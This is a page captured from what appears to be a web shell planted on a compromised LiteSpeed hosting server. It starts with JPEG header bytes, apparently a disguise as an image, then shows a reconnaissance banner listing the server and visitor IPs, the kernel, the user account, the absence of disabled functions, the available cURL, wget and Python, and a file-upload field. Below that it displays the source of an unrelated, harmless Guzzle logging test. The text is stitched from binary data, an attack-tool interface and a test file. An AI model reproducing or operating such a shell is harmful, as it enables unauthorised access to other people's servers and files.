����JFIF��x�x����'
| Server IP : 78.140.185.180 / Your IP : 216.73.216.169 Web Server : LiteSpeed System : Linux cpanel13.v.fozzy.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64 User : builderbox ( 1072) PHP Version : 7.3.33 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /home/builderbox/././././www/vendor/guzzle/guzzle/tests/Guzzle/Tests/Log/ |
Upload File : |
<?php
namespace Guzzle\Tests\Log;
use Guzzle\Log\Zf2LogAdapter;
use Zend\Log\Logger;
use Zend\Log\Writer\Stream;
/**
* @covers Guzzle\Log\Zf2LogAdapter
*/
class Zf2LogAdapterTest extends \Guzzle\Tests\GuzzleTestCase
{
/** @var Zf2LogAdapter */
protected $adapter;
/** @var Logger */
protected $log;
/** @var resource */
protected $stream;
protected function setUp()
{
$this->stream = fopen('php://temp', 'r+');
$this->log = new Logger();
$this->log->addWriter(new Stream($this->stream));
$this->adapter = new Zf2LogAdapter($this->log);
}
public function testLogsMessagesToAdaptedObject()
{
// Test without a priority
$this->adapter->log('Zend_Test!', \LOG_NOTICE);
rewind($this->stream);
$contents = stream_get_contents($this->stream);
$this->assertEquals(1, substr_count($contents, 'Zend_Test!'));
// Test with a priority
$this->adapter->log('Zend_Test!', \LOG_ALERT);
rewind($this->stream);
$contents = stream_get_contents($this->stream);
$this->assertEquals(2, substr_count($contents, 'Zend_Test!'));
}
public function testExposesAdaptedLogObject()
{
$this->assertEquals($this->log, $this->adapter->getLogObject());
}
}